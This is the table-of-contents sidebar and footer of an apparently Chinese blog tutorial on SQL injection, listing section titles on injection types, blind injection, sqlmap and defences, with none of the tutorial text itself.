toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">3.2.</span> <span class="toc-text">字符型注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%90%9C%E7%B4%A2%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">3.3.</span> <span class="toc-text">搜索型注入</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E8%8A%9D%E5%A3%AB"><span class="toc-number">4.</span> <span class="toc-text">探测芝士</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A1%B5%E9%9D%A2%E6%AF%94%E8%BE%83%E6%B3%95"><span class="toc-number">4.1.</span> <span class="toc-text">页面比较法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5-1"><span class="toc-number">4.1.1.</span> <span class="toc-text">数字型注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5-1"><span class="toc-number">4.1.2.</span> <span class="toc-text">字符型注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%9C%E7%B4%A2%E5%9E%8B%E6%B3%A8%E5%85%A5-1"><span class="toc-number">4.1.3.</span> <span class="toc-text">搜索型注入</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E6%AF%94%E8%BE%83%E6%B3%95"><span class="toc-number">4.2.</span> <span class="toc-text">时间比较法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E8%8A%9D%E5%A3%AB-%E9%80%9A%E7%94%A8%E7%AF%87"><span class="toc-number">5.</span> <span class="toc-text">注入芝士-通用篇</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">5.1.</span> <span class="toc-text">错误信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%85%83%E6%95%B0%E6%8D%AE"><span class="toc-number">5.2.</span> <span class="toc-text">获取元数据</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Order-by%E8%AF%AD%E5%8F%A5"><span class="toc-number">5.3.</span> <span class="toc-text">Order by语句</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#UNION%E6%9F%A5%E8%AF%A2%EF%BC%88%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">5.4.</span> <span class="toc-text">UNION查询（联合查询注入）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E5%AD%97%E6%AE%B5%E6%95%B0%EF%BC%88%E8%A1%A8%E5%88%97%E6%95%B0%EF%BC%89"><span class="toc-number">5.4.1.</span> <span class="toc-text">探测字段数（表列数）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF"><span class="toc-number">5.4.2.</span> <span class="toc-text">查询敏感信息</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="toc-number">5.5.</span> <span class="toc-text">危险函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%B1%E9%99%A9%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B"><span class="toc-number">5.6.</span> <span class="toc-text">危险存储过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E6%89%A7%E8%A1%8C"><span class="toc-number">5.7.</span> <span class="toc-text">动态执行</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E8%8A%9D%E5%A3%AB-MySQL%E7%89%B9%E8%BE%91"><span class="toc-number">6.</span> <span class="toc-text">注入芝士-MySQL特辑</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#MySQL%E6%B3%A8%E9%87%8A"><span class="toc-number">6.1.</span> <span class="toc-text">MySQL注释</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%98%BE%E9%94%99%E5%BC%8F%E6%B3%A8%E5%85%A5"><span class="toc-number">6.2.</span> <span class="toc-text">显错式注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="toc-number">6.3.</span> <span class="toc-text">宽字节注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%95%BF%E5%AD%97%E7%AC%A6%E6%88%AA%E6%96%AD"><span class="toc-number">6.4.</span> <span class="toc-text">长字符截断</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-number">6.5.</span> <span class="toc-text">布尔盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BB%B6%E6%97%B6%E7%9B%B2%E6%B3%A8"><span class="toc-number">6.6.</span> <span class="toc-text">延时盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E5%8F%A0%E7%9B%B2%E6%B3%A8"><span class="toc-number">6.7.</span> <span class="toc-text">堆叠盲注</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E8%8A%9D%E5%A3%AB-%E8%AE%A4%E8%AF%86sqlmap"><span class="toc-number">7.</span> <span class="toc-text">注入芝士-认识sqlmap</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%82%E7%94%A8%E6%83%85%E5%BD%A2"><span class="toc-number">7.1.</span> <span class="toc-text">适用情形</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4"><span class="toc-number">7.2.</span> <span class="toc-text">基本命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E7%94%A8%E6%B3%95"><span class="toc-number">7.3.</span> <span class="toc-text">特殊用法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%BE%E4%BA%9B%E4%BE%8B%E5%AD%90%EF%BC%88%E5%B8%B8%E8%A7%84%E6%B3%A8%E5%85%A5%EF%BC%8C%E4%BD%BF%E7%94%A8sqlmap%E6%98%AF%E6%B2%A1%E6%9C%89%E7%81%B5%E9%AD%82%E7%9A%84%EF%BC%89"><span class="toc-number">8.</span> <span class="toc-text">举些例子（常规注入，使用sqlmap是没有灵魂的）</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8D%B1%E5%AE%B3"><span class="toc-number">9.</span> <span class="toc-text">注入的危害</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%98%B2%E6%8A%A4%E7%AD%96%E7%95%A5"><span class="toc-number">10.</span> <span class="toc-text">防护策略</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB%E4%B8%80%E8%88%AC%E9%80%9A%E8%BF%87%E7%9B%AE%E6%A0%87%E6%9C%8D%E5%8A%A1%E5%99%A880%E7%AB%AF%E5%8F%A3%E8%BF%9B%E8%A1%8C%EF%BC%8C%E4%BA%A7%E7%94%9F%E7%9A%84%E8%AF%B7%E6%B1%82%E4%BF%A1%E6%81%AF%E4%B8%8E%E5%B8%B8%E8%A7%84%E7%BD%91%E9%A1%B5%E8%AE%BF%E9%97%AE%E6%B2%A1%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%EF%BC%8C%E6%89%80%E4%BB%A5%E4%B8%80%E8%88%AC%E7%9A%84%E9%98%B2%E7%81%AB%E5%A2%99%E4%B8%8D%E4%BC%9A%E8%BF%9B%E8%A1%8C%E8%AD%A6%E5%91%8A%E6%88%96%E6%8B%A6%E6%88%AA%E3%80%82"><span class="toc-number">10.0.0.0.1.</span> <span class="toc-text">SQL注入攻击一般通过目标服务器80端口进行，产生的请求信息与常规网页访问没有什么区别，所以一般的防火墙不会进行警告或拦截。</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">11.</span> <span class="toc-text">&lt;- To be continued  _(:3 ∠)__</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>